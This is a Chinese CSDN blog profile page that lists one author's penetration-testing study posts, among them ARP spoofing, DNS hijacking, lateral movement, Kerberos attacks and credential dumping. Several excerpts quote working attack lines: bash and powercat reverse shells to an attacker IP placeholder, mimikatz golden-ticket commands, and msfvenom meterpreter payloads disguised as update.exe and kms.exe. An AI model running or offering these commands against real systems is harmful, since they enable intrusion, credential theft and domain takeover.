闰土炖猹
码龄1年
关注
提问 私信
  • 博客:40,844
    40,844
    总访问量
  • 36
    原创
  • 31,190
    排名
  • 831
    粉丝

个人简介:祝学有所成

IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:河南省
  • 加入CSDN时间: 2023-10-07
博客简介:

8888的博客

博客描述:
祝学有所成
查看详细资料
  • 原力等级
    领奖
    当前等级
    3
    当前总分
    422
    当月
    8
个人成就
  • 获得820次点赞
  • 内容获得9次评论
  • 获得524次收藏
  • 代码片获得159次分享
创作历程
  • 36篇
    2024年
成就勋章
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

应急响应:ARP欺骗实战

定义‌:ARP是一个TCP/IP协议,用于将IP地址映射到物理网络地址(MAC地址)。‌作用‌:在局域网通信中,当设备有数据要发送给另一个设备时,需要知道对方的MAC地址。ARP协议允许设备通过IP地址找到对应的MAC地址,以便进行通信。‌工作原理‌:主机发送信息时,将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址。收到返回消息后,将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。‌安全性。
原创
发布博客 2024.10.22 ·
892 阅读 ·
17 点赞 ·
0 评论 ·
18 收藏

应急响应:DHCP$DNS劫持实战

1.随机的攻击方式,在局域网内,通过构造一个假的DHCP服务器,在内网机器获取DHCP时看谁dhcp的响应速度快, 哪个快哪个就是DNS或者DHCP的IP地址,可以用于钓鱼(在同一局域网内)重定向到攻击机器的阿帕奇服务,这个就是DNS劫持,我们可以通过DNS劫持来进行构造钓鱼网站,因为这里只有两台机器可以上网,在实际情况中,可以构造一个登录页面。3.钓鱼:比如说你访问百度网页,你在DHCP配置中设置了百度跳转页面,受害者只要访问百度,就会重定向到其他网页,可以做一个登录框,进行攻击。
原创
发布博客 2024.10.09 ·
1429 阅读 ·
18 点赞 ·
0 评论 ·
18 收藏

应急响应:Linux&Windows实战排查

络安全应急响应是指团队或组织为了在网络安全事件发生时能够及时准确地做出反应和应对而建立的一套制度和流程,旨在降低网络安全事件所造成的损失并迅速恢复受影响的系统和服务‌。网络安全应急响应的核心内容包括:预警评估,通过挖掘威胁情报和漏洞信息进行风险评估和预警;事件响应,组织专业人员进行快速响应,包括定位、分析和修复;事后总结,明确问题原因和解决方案,并进行风险评估;技术支持,提供网络安全技术支持以提高网络的安全性;培训教育,提升组织内部员工的安全意识和应急响应能力。
原创
发布博客 2024.10.08 ·
1041 阅读 ·
35 点赞 ·
0 评论 ·
28 收藏

社会工程学:社工无处不在

社会工程学是一种非技术性攻击,它利用人类的弱点,比如好奇心、信任、恐惧、无知和疏忽等,来获取信息或者进入安全措施保护下的系统。宏病毒是一种新形态的计算机病毒,也是一种跨平台式计算机病毒,可以存储在Microsoft 365文件(如文档、演示文稿、工作簿或模板)的宏中,或者存储在任何ActiveX控件、COM加载项或Microsoft 365加载项中‌。5.加强员工培训:在公司内部,要加强员工的安全意识和培训,教育员工如何避免成为社会工程学攻击的受害者,以及如何保护公司的敏感信息和资产。
原创
发布博客 2024.10.06 ·
1199 阅读 ·
18 点赞 ·
0 评论 ·
20 收藏

内网安全:反弹shell

PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2。powercat -c 攻击机器IP -p 9999 -v -ep。
原创
发布博客 2024.09.10 ·
1640 阅读 ·
19 点赞 ·
0 评论 ·
14 收藏

内网隧道:端口转发

端口转发和端口映射端口转发,有时被称为做隧道,是安全壳( SSH)为网络安全通信使用的一种方法简单来说,端口转发就是将 一个端口收到的流量转发到另一个端口。端口映射是 NAT的一种,功能是把在公网的地址转成私有地址。简单来说,端口映射就是将一个端口映射 到另一个端口供其他人使用端口转发:只针对于机器的某个特定端口本次实验三种端口转发:LCXSSHNETSH。
原创
发布博客 2024.09.07 ·
1130 阅读 ·
18 点赞 ·
0 评论 ·
15 收藏

域内安全:委派攻击

从攻击角度来说:如果攻击者拿到了一台配置了非约束委派的机器权限,可以诱导管理员来访问该机器,然后可以得到管理员的TGT,从而模拟管理员访问任意服务,相当于拿下了整个域环境,或者结合打印机漏洞让域管用户强制回连以缓存 TGT,一个域内用户访问WEB服务,但是一些资源在文件服务上,这个时候就需要委派,需要web系统代表用户A去访问文件服务的资源。3、这个时候如果域管访问了机器我们的内存中就会有域管的TGT,就可以访问任意机器了,在与域控上执行访问(在域控上执行)
原创
发布博客 2024.08.30 ·
1275 阅读 ·
15 点赞 ·
0 评论 ·
30 收藏

内网安全:跨域攻击

mimikatz kerberos::golden /domain:子域 /sid:子域SID /sids:父域-519 /rc4:信任密钥 /user:任意用户 /service:krbtgt /target:父域 /ticket:subdc_administrator.kirbi。Kerberos::golden /user:administrator /domain:当前域名 /sid:当前SID /sids:目标域SID519 /krbtgt:krbtgt散列 /ptt。查看当前域中计算机的权限。
原创
发布博客 2024.08.18 ·
1543 阅读 ·
12 点赞 ·
0 评论 ·
12 收藏

域控安全:读取ntds.dit文件中的hash值

在线的方式就是直接读取不需要在导出ntds文件,在域环境中,不要直接在线获取hash,特别是域环境比较大的时候,在线获取hash等待时时间较长,工具占用资源太多,容易造成域控服务器崩溃。2.将ntds.dit文件复制到这个工具目录里面然后导出,两个重要的表为:datatable以及link_table,他们都会被存放在./ntds.dit.export/文件夹中。使用secretsdump直接读取,需要有高权限的票据,IPC,什么的,可以远程读取目标机器的hash,就是远程读取。2、然后利用再在本地进行。
原创
发布博客 2024.08.08 ·
977 阅读 ·
21 点赞 ·
0 评论 ·
13 收藏

域控安全:多种方式提取ntds.dit

ntds.dit为AD的数据库,内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控的用户(如域管用户、DC本地管理员用户)可以访问。可以通过创建一个 IFM 的方式获取 ntds.dit,在使用 ntdsutil 创建媒体安装集(IFM)时,需要进行生成快照、加载、将 ntds.dit 和计算机的 SAM 文件复制到目标文件夹中等操作,这些操作也可以通过PowerShell 或 VMI 远程执行。第三步:复制快照中的ntds.dit文件。第二步:创建一个C盘的卷影副本。
原创
发布博客 2024.08.07 ·
1132 阅读 ·
20 点赞 ·
0 评论 ·
17 收藏

内网安全:多种横向移动方式

DCOM:DCOM(分布式组件对象模型)是微软的一系列概念和程序接口。它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。利用这个接口,客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求,使用DCOM进行横向移动的优势之一在于,在远程主机上执行的进程将会是托管COM服务器端的软件获取DCOM列表:实验前提:1.关闭防火墙2.必须有管理员权限。
原创
发布博客 2024.08.03 ·
1133 阅读 ·
26 点赞 ·
0 评论 ·
16 收藏

WMI横向

WMI:psexec被杀软禁用,WMI是一种新型的横向移动工具,本身的组织架构是数据库架构,在用WMI进行横向时,Windows操作系统不会将WMI的操作记录在日志中。简单来说:wmic就是wmic.exe,位于windows目录底下,是一个命令行程序。WMIC可以以两种模式执行:交互模式(Interactive mode)和非交互模式(Non-Interactive mode),WMI就是 WindowsManagement Instrumentation(Windows 管理规范)。
原创
发布博客 2024.07.29 ·
846 阅读 ·
18 点赞 ·
0 评论 ·
28 收藏

PsExec横向:IPC&PTH&PTT

PsExec工具:psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开方3389端口,只需要对方开启admin$共享和ipc$ (该共享默认开启,依赖于445端口)。但是,假如目标主机开启了防火墙(防火墙禁止445端口连接),psexec也是不能使用的,会提示找不到网络路径。
原创
发布博客 2024.07.28 ·
991 阅读 ·
40 点赞 ·
0 评论 ·
5 收藏

内网横向:PTH&PTK&PTT

条件:有管理员的NTLM Hash 并且目标机器开 放445端口在工作组环境中: Windows Vista 之前的机器,可以使用本地管理员组内用户进行攻击。WindowsVista 之后的机器,只能是administrator用户的哈希值才能进行哈希传递攻击,其他用户(包括管理员用户但是非administrator)也不能使用哈希传递攻击,会提示拒绝访问。
原创
发布博客 2024.07.25 ·
1063 阅读 ·
17 点赞 ·
0 评论 ·
12 收藏

内网安全:IPC横向

IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
原创
发布博客 2024.07.23 ·
791 阅读 ·
17 点赞 ·
1 评论 ·
1 收藏

内网安全:各类密码的抓取

sam文件和lsass进程就是Windows存储本地密码的文件和进程,我们可以通过读取sam文件和lsass进程,可以获得本地的用户密码,从而进行内网横向。
原创
发布博客 2024.07.21 ·
2335 阅读 ·
29 点赞 ·
2 评论 ·
25 收藏

Windows认证LM Hash和NTLM Hash以及认证协议

Windows密码一般放在:c://windows/system/config/SAM我们在winlogon.exe输入密码时,会发送到lsass.exe 去转化为NTLM Hash与SAM文件中的值去对比 ,如果相同,将user id 与group id 发送给winlogon.exe 准备桌面,登录成功。不同则失败LM Hash和NTLM Hash:Windows中的密码一般由两部分组成,一部分是LM哈希和NTLM哈希Hash 结构:username:RID:LM‐HASH:NT‐HASH。
原创
发布博客 2024.07.19 ·
988 阅读 ·
17 点赞 ·
0 评论 ·
17 收藏

内网安全:权限维持的各种姿势

监听:msfconsole -x "use exploit/multi/handler;MSF后门和监听:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9997 -f exe -o update.exe。MSF后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9999 -f exe -o kms.exe。
原创
发布博客 2024.07.12 ·
2323 阅读 ·
19 点赞 ·
0 评论 ·
33 收藏

内网安全:域内信息探测

四种情况:1.本地用户:user2.本地管理员用户:家庭版禁用,server才有3.域内用户4.域内管理员本地普通用户不能获取域内信息本地管理员用户,可以直接提权为system用户(域内用户),可以获取域内信息一.判断域是否存在:1.查看域:ipconfig/all 或 systeminfo 或net config workstation。
原创
发布博客 2024.07.11 ·
2018 阅读 ·
31 点赞 ·
0 评论 ·
18 收藏

内网信息收集:手动、脚本和工具查IP、端口

以下命令在CS执行时命令前须加shell,如:shell ipconfig1.收集IP网卡: ipconfig2.收集操作系统和软件信息: systeminfo3.查看操作系统的体系结构:echo %PROCESSOR_ARCHITECTURE%4.查看目录和文件夹:shell dir shell type 文件名5.查看操作系统的软件及版本信息:6.本机的服务信息: wmic service list brief。
原创
发布博客 2024.07.08 ·
1515 阅读 ·
29 点赞 ·
1 评论 ·
13 收藏
加载更多